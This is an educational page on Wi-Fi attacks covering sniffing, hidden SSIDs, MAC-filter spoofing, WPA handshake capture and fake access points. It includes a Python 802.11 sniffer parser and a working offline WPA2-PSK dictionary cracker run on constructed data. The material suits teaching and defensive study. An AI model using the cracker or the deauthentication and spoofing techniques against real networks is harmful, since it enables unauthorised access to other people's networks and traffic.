CS Wi-Fi Attacks
WIFI is a significant part of computer security: systems and devices can be reached by anyone within signal range, rather than only by someone physically connected with a cable, and many new products are networked over WIFI.
WIFI Basics
Most people know that WIFI comes from the IEEE 802.11 family of standards. Other protocols also use radio for signaling, for example:
- Bluetooth, for communicating with devices we carry, typically smartphones, headphones etc.
- NFC (“Near Field Communications”), implemented in access badges and credit cards for wireless transmission of data.
- RFID (“Radio Frequency Identification”), used for access cards and other devices, for example a car which can wirelessly transmit its identifier to a toll-road system.
- ZigBee and Z-Wave, used for enterprise and home automation.
Wireless communication usually goes through an AP (“Access Point”), a wireless base station that acts as a switch and router between the clients that want to communicate. Peer-to-peer communication is also possible, although less common.
The “Service Set Identifier” (SSID) is the name of a wireless network.
Because WIFI transmissions are broadcast over the air (typically from omnidirectional antennas), an attacker with a suitable antenna can easily “sniff” the frames sent by anyone in range. Sniffing is simply listening for the packets visible to the network interface.
WIFI often gives users access to internal applications, which increases the attack surface. In addition, the firmware and management interfaces of WIFI equipment may contain vulnerabilities, and these are sometimes patched more slowly than other organizational assets.
WIFI Security
A WIFI network can be configured with:
- No security
- Access list based on MAC addresses
- PSK (“Pre-Shared Key”)
- Enterprise authentication
Attacking WIFI requires a network card with two main capabilities:
- Monitor Mode: the card passes every 802.11 frame it receives (management, control and data frames) to the operating system, regardless of the destination MAC address and without being associated to any network.
- Packet Injection: the card can transmit raw, attacker-crafted 802.11 frames, including frames with a source MAC address other than its own.
Open WIFI Networks
A WIFI network without a password is called an open WIFI network. Traffic between the AP and the clients is not encrypted at the WIFI layer; each party must rely on higher-layer encryption, such as TLS or a VPN, to protect its own traffic. These networks are more accessible and convenient for users, but at a cost in security.
Sniffing packets on an open network lets an attacker see directly what other users are doing. The packets may contain sensitive information, or simply details of what people are doing on the network.
Hidden SSID
APs can often be configured not to broadcast the network name. Clients must then prove that they know the SSID in order to connect. Hiding the SSID is not considered best practice: the name is exposed anyway whenever a client connects, because the client sends it in the clear in its probe and association requests. Worse, clients now have to ask for the hidden network wherever they go, broadcasting the names of the networks they want to join. An attacker sniffing the clients’ WIFI traffic can learn which networks they have used before and, from that, more about who the clients are.
MAC Address Filtering
Some APs support access control based on MAC addresses: the AP keeps an allow-list of the MAC addresses that are permitted to connect to and use the network.
This is not a secure control. An attacker can already sniff the network traffic of other systems and note their MAC addresses, then change the attacker’s own MAC address to one that is already approved. This bypasses MAC address filtering entirely, because the MAC address is sent in the clear in every frame and is never authenticated.
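The following is an added example, not code from the original page, showing what a passive sniffer in monitor mode learns from raw 802.11 frames: the SSID and BSSID from beacons (including the empty SSID of a “hidden” network), the network names a client asks for in probe requests, and the MAC addresses of stations exchanging data frames, which are exactly the addresses an attacker clones to get past MAC filtering. The frames are constructed inline and stand in for a capture with the radiotap header already stripped; the MAC addresses and network names are invented for the example.

```python
"""Minimal IEEE 802.11 frame parser: what a passive sniffer can see (added example)."""
import struct

TYPE_MGMT, TYPE_DATA = 0, 2
SUBTYPE_PROBE_REQ, SUBTYPE_BEACON = 4, 8
TAG_SSID, TAG_RSN = 0, 48           # information element ids for SSID and RSN (WPA2/3)
BROADCAST = b"\xff" * 6


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_tags(body: bytes) -> dict:
    """Walk the information-element list: 1 byte id, 1 byte length, data."""
    tags, i = {}, 0
    while i + 2 <= len(body):
        tag_id, length = body[i], body[i + 1]
        tags[tag_id] = body[i + 2:i + 2 + length]
        i += 2 + length
    return tags


def parse_frame(frame: bytes) -> dict:
    """Decode the 802.11 MAC header and the frame types a sniffer cares about."""
    fc0, fc1 = frame[0], frame[1]
    ftype, subtype = (fc0 >> 2) & 0x3, fc0 >> 4
    to_ds, from_ds = fc1 & 0x1, (fc1 >> 1) & 0x1
    addr1, addr2, addr3 = frame[4:10], frame[10:16], frame[16:22]
    body = frame[24:]
    if ftype == TYPE_MGMT and subtype == SUBTYPE_BEACON:
        # timestamp(8) + beacon interval(2) + capability(2) precede the tags
        tags = parse_tags(body[12:])
        ssid = tags.get(TAG_SSID, b"")
        return {"kind": "beacon", "bssid": mac_str(addr3),
                "ssid": ssid.decode(errors="replace"),
                "hidden": len(ssid) == 0, "encrypted": TAG_RSN in tags}
    if ftype == TYPE_MGMT and subtype == SUBTYPE_PROBE_REQ:
        tags = parse_tags(body)   # the client names the network it is looking for
        return {"kind": "probe_req", "client": mac_str(addr2),
                "ssid": tags.get(TAG_SSID, b"").decode(errors="replace")}
    if ftype == TYPE_DATA and to_ds and not from_ds:     # station -> AP
        return {"kind": "data", "station": mac_str(addr2), "bssid": mac_str(addr1)}
    if ftype == TYPE_DATA and from_ds and not to_ds:     # AP -> station
        return {"kind": "data", "station": mac_str(addr1), "bssid": mac_str(addr2)}
    return {"kind": "other"}


# --- constructed frames standing in for a monitor-mode capture ---------------
def mgmt_frame(subtype: int, da: bytes, sa: bytes, bssid: bytes, body: bytes) -> bytes:
    fc = bytes([(subtype << 4) | (TYPE_MGMT << 2), 0x00])
    return fc + b"\x00\x00" + da + sa + bssid + b"\x00\x00" + body


def beacon(bssid: bytes, ssid: bytes, encrypted: bool) -> bytes:
    fixed = struct.pack("<QHH", 0, 100, 0x0011 if encrypted else 0x0001)
    tags = bytes([TAG_SSID, len(ssid)]) + ssid
    if encrypted:
        tags += bytes([TAG_RSN, 2, 0x01, 0x00])   # RSN IE truncated to its version field
    return mgmt_frame(SUBTYPE_BEACON, BROADCAST, bssid, bssid, fixed + tags)


def probe_request(client: bytes, ssid: bytes) -> bytes:
    return mgmt_frame(SUBTYPE_PROBE_REQ, BROADCAST, client, BROADCAST,
                      bytes([TAG_SSID, len(ssid)]) + ssid)


def data_to_ap(station: bytes, bssid: bytes, dest: bytes, payload: bytes) -> bytes:
    fc = bytes([TYPE_DATA << 2, 0x01])            # flags: ToDS=1, FromDS=0
    return fc + b"\x00\x00" + bssid + station + dest + b"\x00\x00" + payload


def summarize(frames: list) -> dict:
    """Build up what a passive observer knows: networks, probed names, live stations."""
    networks, probed, stations = {}, [], set()
    for f in map(parse_frame, frames):
        if f["kind"] == "beacon":
            networks[f["bssid"]] = f
        elif f["kind"] == "probe_req":
            probed.append((f["client"], f["ssid"]))
        elif f["kind"] == "data":
            stations.add((f["station"], f["bssid"]))   # approved MACs worth cloning
    return {"networks": networks, "probed": probed, "stations": stations}


AP1, AP2 = bytes.fromhex("001122334455"), bytes.fromhex("00aabbccdd01")
CLIENT1, CLIENT2 = bytes.fromhex("aabbccddee01"), bytes.fromhex("aabbccddee02")
CAPTURE = [
    beacon(AP1, b"CorpWifi", encrypted=True),
    beacon(AP2, b"", encrypted=True),                  # hidden SSID: zero-length name
    probe_request(CLIENT1, b"HomeNet-Smith"),          # client leaks a remembered network
    probe_request(CLIENT1, b"CorpHidden"),             # client names the hidden network
    data_to_ap(CLIENT2, AP1, AP1, b"\xaa\xaa\x03"),    # associated station on CorpWifi
]

if __name__ == "__main__":
    print(summarize(CAPTURE))
```

Note that nothing in the summary required associating to any network or knowing any key: beacons, probe requests and MAC headers are always sent in the clear, even on a WPA-protected network.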
PSK ("Pre-Shared Key")
PSK simply means that the network is configured with a password. PSK protection is normally implemented with the WPA (“WIFI Protected Access”) protocol. Older protocols such as WEP (“Wired Equivalent Privacy”) still exist but are no longer used, because WEP has severe security flaws and is trivially broken.
WPA comes in several versions, WPA3 being the newest standard as of 2021. WPA is far more secure than WEP, although it still has some weaknesses. Against a WPA-protected network an attacker must resort to password cracking, which is considered expensive in terms of time if the password is reasonably strong. With WPA and WPA2-PSK the cracking can be done offline against a captured handshake; WPA3’s SAE handshake is designed so that a passive capture does not allow offline guessing.
If an attacker can observe (sniff) any client authenticating to the network, that is, the 4-way handshake between client and AP, they have enough material for offline password cracking; with packet injection the attacker can even provoke a handshake by sending deauthentication frames so that a connected client reconnects. Tools such as aircrack-ng (https://www.aircrack-ng.org/) support cracking WIFI passwords.
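The following is an added example, not code from the original page and not aircrack-ng’s own code, implementing the computation such tools perform on a captured WPA2-PSK handshake: derive the PMK from each candidate passphrase and the SSID (PBKDF2-HMAC-SHA1, 4096 rounds), expand it to the PTK using the two MAC addresses and the two nonces from the handshake, and check whether the first 16 bytes of the PTK (the KCK) reproduce the MIC on the captured EAPOL-Key message 2. Every handshake value is constructed inline (MACs, nonces, EAPOL frame) and the “captured” MIC is computed from a known passphrase so that the attack has something to recover; the SSID, addresses and wordlist are invented for the example.

```python
"""Offline dictionary attack on a WPA2-PSK 4-way handshake (added example)."""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes) per 802.11i."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF: concatenated HMAC-SHA1(key, label || 0x00 || data || i) blocks."""
    out = b""
    for i in range(4):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK plus the public handshake values; the KCK is its first 16 bytes."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


MIC_OFFSET = 81   # EAPOL header (4) + key descriptor fields up to the Key MIC field


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """WPA2 (descriptor version 2): HMAC-SHA1 over the frame with the MIC zeroed, cut to 16 bytes."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Constructed EAPOL-Key message 2 (client -> AP) carrying the SNonce and the MIC."""
    key_info = 0x010a                       # pairwise, MIC present, descriptor version 2
    body = (b"\x02"                         # descriptor type: RSN
            + key_info.to_bytes(2, "big")
            + (16).to_bytes(2, "big")       # key length
            + (1).to_bytes(8, "big")        # replay counter
            + snonce
            + b"\x00" * 16                  # key IV
            + b"\x00" * 8                   # key RSC
            + b"\x00" * 8                   # key ID (reserved)
            + mic
            + (0).to_bytes(2, "big"))       # key data length (RSN IE omitted here)
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def crack_handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol, wordlist):
    """Return the first candidate whose derived KCK reproduces the captured MIC, else None."""
    captured_mic = eapol[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol), captured_mic):
            return candidate
    return None


# --- constructed "capture" --------------------------------------------------
SSID = "CorpWifi"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("aabbccddee02")
ANONCE = bytes(range(32))           # stand-ins for the random nonces seen in messages 1 and 2
SNONCE = bytes(range(32, 64))


def make_capture(passphrase: str) -> bytes:
    """Simulate the client side: message 2 with the genuine MIC, as a sniffer would see it."""
    kck = derive_ptk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return build_eapol_msg2(SNONCE, eapol_mic(kck, build_eapol_msg2(SNONCE)))


CAPTURED_MSG2 = make_capture("correct horse battery")
WORDLIST = ["password", "letmein", "CorpWifi2021", "correct horse battery", "admin1234"]


def run() -> str:
    return crack_handshake(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, CAPTURED_MSG2, WORDLIST)


if __name__ == "__main__":
    print("recovered passphrase:", run())
```

The cost of the attack is dominated by the 4096 PBKDF2 rounds per candidate, which is why the page calls cracking expensive when the passphrase is strong: a passphrase not in the attacker’s wordlist (or any reasonable mutation of it) is never recovered, whereas everything in the wordlist falls regardless of how the network is otherwise configured. Real captures are normally processed with aircrack-ng or hashcat, which implement this same derivation far faster on GPUs.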
Enterprise Authentication
Enterprise access points can instead hand client authentication to a centralized authentication service (typically a RADIUS server reached over 802.1X/EAP), so that clients authenticate with certificates, which requires a PKI (“Public Key Infrastructure”), or with their enterprise credentials.
This has several advantages, particularly for key management: the fundamental weakness of a PSK network is the distribution, rotation and revocation of a single shared password, which every user knows and which must be changed whenever anyone leaves.
Enterprise Authentication gives better key management, but it requires a more complicated architecture and introduces additional attack vectors; for example, a client that does not validate the authentication server’s certificate can be tricked into authenticating against an attacker’s fake AP and server.
Fake WIFI Access Points
Attackers can easily start broadcasting networks that pose as legitimate ones. Clients often join nearby networks automatically when they see an SSID they remember, without verifying that the AP is the real one. By luring clients onto their own network, attackers can sniff and manipulate the clients’ traffic as they see fit.